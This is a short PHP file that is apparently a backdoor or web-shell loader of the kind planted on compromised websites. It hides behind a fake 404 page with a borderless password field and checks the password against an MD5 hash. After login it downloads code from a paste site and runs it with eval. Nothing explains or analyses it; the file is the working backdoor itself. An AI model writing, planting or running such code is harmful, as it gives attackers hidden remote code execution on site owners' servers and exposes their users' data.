<?php
session_start();
$password = '9c983d1fc5500dce0b8f78e698372b8a';

if (!isset($_SESSION[md5($password)])) {
    if(isset($_POST['password']) && !empty($_POST['password']) && md5($_POST['password']) == $password) {
        $_SESSION[md5($password)] = true;
    } else {
        http_response_code(404);
        echo '<form method="post" action=""><input type="password" style="border:none" name="password"></form>';
        exit;
    }
}
$sa = file_get_contents('https://pastee.dev/r/uvZ2LqvN/0');
eval('?>'.$sa);
